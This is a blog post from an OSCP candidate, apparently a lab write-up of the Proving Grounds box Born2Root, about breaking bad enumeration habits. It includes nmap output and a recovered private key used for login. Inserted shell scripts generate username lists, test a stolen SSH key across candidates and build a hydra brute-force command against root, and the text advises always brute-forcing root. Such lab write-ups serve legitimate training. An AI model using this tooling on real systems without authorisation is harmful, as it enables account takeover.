Breaking the HTB Habits and building better OSCP ones…
Born2Root pseudo writeup.
As a quick reminder: I just took the OSCP and failed. I learned that the OSCP is not HackTheBox. If you want to read about the lessons learned, go to that link. It really outlines the different mentality and methodology you need specifically for the OSCP.
So while this is kind of a box writeup, it’s more a discussion of bad habits learned from HTB and how they affect OSCP-like box hacking. I don’t walk through the correct steps for this box; I walk through the actual steps I took and then review where I messed up. Hopefully this will help someone else who crushes HTB machines but struggles with OSCP. Let’s go…
Before getting into the box let’s do a quick rundown on what we learned by failing the OSCP. Bullet point summary here we go!
- Not every vulnerability/CVE/Exploit is the way in.
- Making some progress on some particular application or port is not always a clue that you’re going the right direction to get in.
- Enumerate harder than you exploit.
- Try harder? No. Try something else.
So if HTB was building bad habits, it’s time to pack our bags and move to a new home. And the closest thing to the OSCP I could imagine would be Offensive Security’s other little goodie — Proving Grounds.
Paid for Practice as well as Play, because 3 hours ain’t enough. Went straight to Play, got to work and started looking around for a good Intermediate 8-pointer. Nothing says these box points are gauged the same way the actual OSCP boxes are, but I’d like to pretend. If I’m getting into 20- and 25-pointers at Proving Grounds, I have to imagine I’m pretty close to where I need to be. But for now, let’s try a little taste of what Proving Grounds has to offer with a little baby 8.
Now a little spoiler, despite knowing where I went wrong on the OSCP I still ended up sticking to my guns. This machine should have taken a quick nmap, visit the site, run some things in the background, get a cup of coffee. Root. But instead I HTB’d the heck out of this for 4 hours. Here we go.
So I’m typically a nmap -sV -sC -A kind of guy. But I wanted to start learning AutoRecon after hearing so many good things about it. So we fired that off and got loads of results back.
From this I’ll give you the summary. I cut out all the junk and just pasted what matters below.
80/tcp open http syn-ack Apache httpd 2.4.10 ((Debian))
|_http-title: Secretsec Company
|_http-server-header: Apache/2.4.10 (Debian)
| /robots.txt: Robots file
| /files/: Potentially interesting directory w/ listing on
| http-robots.txt: 2 disallowed entries
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
| (1) http://192.168.200.49:80/:
| (1) email:
|_ + email@example.com
22/tcp open ssh syn-ack OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
44532/tcp open status syn-ack 1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
From all of these I know that I can do loads of enumeration on 80, maybe something with the RPC, and I have nothing for 44532. Let’s knock out 44532 real quick.
I do a google search and I don’t find anything useful on what that port might be.
So I do a quick nc.
Cool. Didn’t want to talk to you either. Let’s go back to dig into port 80.
Just from the nmap we know a few things.
- the /files/ directory exists, and it has directory listing turned on
- so does /wordpress-blog (but no /wp-admin?)
- Apache 2.4.10 on Debian
- the site title is "SecretSec Company", and the page already leaked one email address
- 44532 isn’t a mystery either: nmap labels it "status" (RPC program 100024), which is rpc.statd, the NFS lock-status daemon registered with rpcbind on 111. rpcinfo -p 192.168.200.49 lists the same mapping, so this is a high ephemeral RPC port, not a custom service.
Let’s take a look at the site.
Okay cool. I see martin’s email again. And three new names of employees and possible users later down the road. Cool. Also good job editing the Apache default page guy. Good work.
Let’s take a look at the /wordpress-blog page real quick.
Ha. Jerk. You’re sooo getting hacked.
Note: I did in fact try a WPScan a couple times just in case. Of course nothing.
What about /Files?
Okay. Not a lot going on here. What about GoBuster Directory discovery?
Cool, sweet, we got some 301s. /manual looks interesting. So does /server-status, but it’s a 403. /icons is always there and defaults to the installation. So let’s take a peek at /manual.
Okay okay okay. I know this. If you have a default Apache server running, then you might have the default page with the manual links in all the languages. This isn’t going to do anything for us. This just leads us to the Apache manuals page in various languages.
Watch as I dive deeper and deeper into a hole
What about source code? Nothing fancy, but there was a comment block with a set of divs for navigation. In it were some pages I had yet to see.
- Config Files
Of course I tried manually checking these out but I didn’t find anything gobuster didn’t already know.
Next I go ahead and check Apache out. I do a quick google and a searchsploit.
I’m going to save you the headache of talking through trying about 3 of those out. Matter of fact. This is a good time to pause.
I had already made a few pretty big mistakes.
First off, if you’ve done this box before, you caught it. That part earlier where I found the /icons directory and just went “oh, there’s nothing there, that’s default”. Yep. That was a mistake. Also, I had a handful of possible usernames, so why didn’t I go ahead and just fire off some hydra against SSH using those names and rockyou? Wouldn’t hurt to get that going in the background. Matter of fact, I think as a rule moving forward, I will always get hydra going against root on SSH if it’s available. Who knows. You might get root on a box in your sleep. That would be the case for this box if it was on the test at least.
So here I am, thinking I’ve done all I can. This was the exact feeling I had on the OSCP.
I enumerated RPC and kept trying different exploits against Apache. I’ve done “the easy stuff” and was going for “try harder”. Maybe even kernel level stuff on this one? But then it hit me. I was following my bad habits again and I started from the top. Looked at nmap and looked at gobuster. And there I saw it. I hadn’t looked at /icons. So let’s take a look.
Loollll. There sits a text file in the icons directory. Just a little ole text file. Three hours in and it was something I could have seen within the first 30 minutes. Well. What’s in it you say? Lol well.
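As an added example (not commands from the original post), here is a small POSIX shell helper that does what got skipped above: pull every linked name out of an Apache "Index of" listing and report anything that does not belong in that directory, so a stray text file in /icons jumps out on the first pass instead of being waved off as default. The sample listing embedded in the script is constructed; the target URL and the list of "expected" icon extensions are assumptions.

```sh
#!/bin/sh
# Added example, not code from the original post. Parses an Apache
# directory listing and reports entries that do not fit the directory's
# expected contents. Target URL and the icon extension list are
# assumptions; SAMPLE_LISTING is a constructed stand-in for a real page.

# list_entries: read an Apache "Index of" page on stdin and print one
# linked name per line. Drops the column-sort links (href="?C=N;O=D")
# and the "Parent Directory" link (href="/" or "../").
list_entries() {
    grep -o 'href="[^"]*"' | sed 's/^href="//; s/"$//' \
        | grep -v '^?' | grep -v '^/' | grep -v '^\.\./$'
}

# odd_entries: from a listing on stdin, keep only files whose extension
# is not an image type. Subdirectories (trailing /) are dropped here;
# pull them with `list_entries | grep '/$'` and visit them separately.
# The extension list is an assumption about what /icons should hold.
odd_entries() {
    list_entries | grep -v '/$' | grep -Ev '\.(gif|png|jpg|jpeg|ico|svg|xbm)$'
}

# check_listing URL: fetch a directory (trailing slash matters, or you
# get the 301 gobuster reported instead of the index) and filter it.
# Example call, host taken from the nmap output above:
#   check_listing http://192.168.200.49/icons/
check_listing() {
    curl -s -f "$1" | odd_entries
}

# Constructed sample page so the script runs offline; the file names in
# it are made up and are not what sits on the real box.
SAMPLE_LISTING='<html><body><h1>Index of /icons</h1><pre><a href="?C=N;O=D">Name</a> <a href="/">Parent Directory</a> <a href="a.gif">a.gif</a> <a href="small/">small/</a> <a href="notes.txt">notes.txt</a></pre></body></html>'

# demo: run the filter over the constructed page.
demo() {
    printf '%s\n' "$SAMPLE_LISTING" | odd_entries
}

demo
```

Run it against every directory gobuster hands back, including the ones you "know" are stock. The point is not the filter itself but that looking costs seconds, and an unexpected .txt or .zip in a directory that should only hold images is exactly the kind of thing that never shows up in an exploit search.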
A private key. Literally not even hacking at this point. Just using the keys that are laying around. As you can see I downloaded it, copied it over and named it id_rsa. We have a few names that could be usernames, but the one that stands out was martin. So let’s try him first.
Man do I feel dumb. I was pulling out the big guns and this wasn’t even a fight. Not to mention he had some secret password function that was broken. If you’re curious I just left it blank and got in. So. That’s user level access gained.
Now I won’t go through all the details of the next 2 hours of Priv Esc. Because it was pointless. Good practice, but doesn’t get you closer to root.
Quick Summary and a Big Lesson
Tired of looking through files and privesc script output, I fired a hail mary while I went and made a bagel. The hail mary? A brute force against root on SSH. And that was it. I was infuriated. I could have done that first thing and skipped everything else. I doubt this exact thing would be the case on the OSCP, but this sort of run-around, drowning in vulnerabilities and exploits while the answer sits right in front of you? Yeah, that’s the OSCP’s calling card.
Looking back I now know that this habit is going to be a tough one to break. Enumerate everything you can when you see it, easiest to hardest. Don’t skip easy things just because you think it’s probably xyz. Just take a look. It takes seconds. And always try to brute force root. It’s dumb to skip it. And the moment you get other usernames? Brute those too.
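As an added example (not the post’s own commands), here is the order the post ends up recommending, written as one shell script: build a username list from the names and e-mail addresses scraped off the site, try the recovered key against every candidate with key-only authentication, and print the hydra line to start against root plus those users in a second terminal while manual enumeration carries on. The sample names are constructed (only "martin" and email@example.com come from the page); the host, key path and wordlist path are assumptions.

```sh
#!/bin/sh
# Added example, not commands from the original post. Turns scraped
# names and e-mail addresses into SSH username candidates, tries a
# recovered private key against each of them, and prints the hydra
# "hail mary" to run in the background. Host, key path and wordlist
# path are assumptions; the names in SAMPLE_NAMES are constructed.

# gen_usernames: read "First Last" lines or bare e-mail addresses on
# stdin; print de-duplicated lowercase candidates in the usual corporate
# formats (first, last, first.last, flast, firstl) plus the local part
# of any e-mail address.
gen_usernames() {
    tr 'A-Z' 'a-z' | while read -r first last _; do
        case "$first" in
            '') continue ;;
            *@*) printf '%s\n' "${first%%@*}"; continue ;;
        esac
        printf '%s\n' "$first"
        [ -n "$last" ] || continue
        f1=$(printf '%s' "$first" | cut -c1)
        l1=$(printf '%s' "$last" | cut -c1)
        printf '%s\n%s.%s\n%s%s\n%s%s\n' \
            "$last" "$first" "$last" "$f1" "$last" "$first" "$l1"
    done | awk '!seen[$0]++'
}

# try_key KEY HOST USERFILE: attempt key-only auth for each candidate.
# BatchMode=yes stops ssh from prompting for a password, so a rejected
# key fails fast and no passwords are ever sent. -n keeps ssh from
# eating the rest of USERFILE on stdin. A passphrase-protected key
# must be loaded into ssh-agent first, since BatchMode cannot prompt.
try_key() {
    key=$1; host=$2; userfile=$3
    chmod 600 "$key"   # ssh refuses a key that is group/world readable
    while read -r u; do
        if ssh -n -i "$key" -o BatchMode=yes -o StrictHostKeyChecking=no \
               -o ConnectTimeout=5 "$u@$host" true >/dev/null 2>&1; then
            printf 'key accepted: %s@%s\n' "$u" "$host"
        fi
    done < "$userfile"
}

# hydra_cmd HOST USERFILE WORDLIST: the brute force the post ends on,
# printed rather than run so it can be started in another terminal.
# -e nsr also tries empty, username-as-password and reversed username.
hydra_cmd() {
    printf 'hydra -L %s -P %s -t 4 -e nsr ssh://%s\n' "$2" "$3" "$1"
}

# Constructed sample input: "martin" and email@example.com are from the
# page, the rest are placeholders standing in for the other employees.
SAMPLE_NAMES='Martin Example
email@example.com
Jane Doe'

# build_userlist OUT: root first, then every scraped candidate.
build_userlist() {
    { echo root; printf '%s\n' "$SAMPLE_NAMES" | gen_usernames; } \
        | awk '!seen[$0]++' > "$1"
}

# Example run (host from the nmap output above, paths assumed):
#   build_userlist users.txt
#   try_key ./id_rsa 192.168.200.49 users.txt
#   hydra_cmd 192.168.200.49 users.txt /usr/share/wordlists/rockyou.txt
```

Two caveats a practitioner would want. First, the key check above only tests whether sshd accepts the key; an interactive login on this box still lands in the extra "secret password" prompt the post mentions, which is a login script, not SSH authentication. Second, keep hydra’s task count low against SSH (hydra itself warns to use -t 4), because many parallel connections are exactly what fail2ban-style blocking and account lockouts key on, and a locked-out root account is worse than a slow brute force.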
I’m going to keep learning these lessons over and over until it sticks. And until then I’ll keep writing about how I’m messing up so you guys won’t have to. If you have any comments or questions about this feel free to reach out. I’m going to do a few more boxes today and try not to repeat the same mistakes. I’ll let you know how it goes! Thanks friendos.
@MehhSecurity on Twitter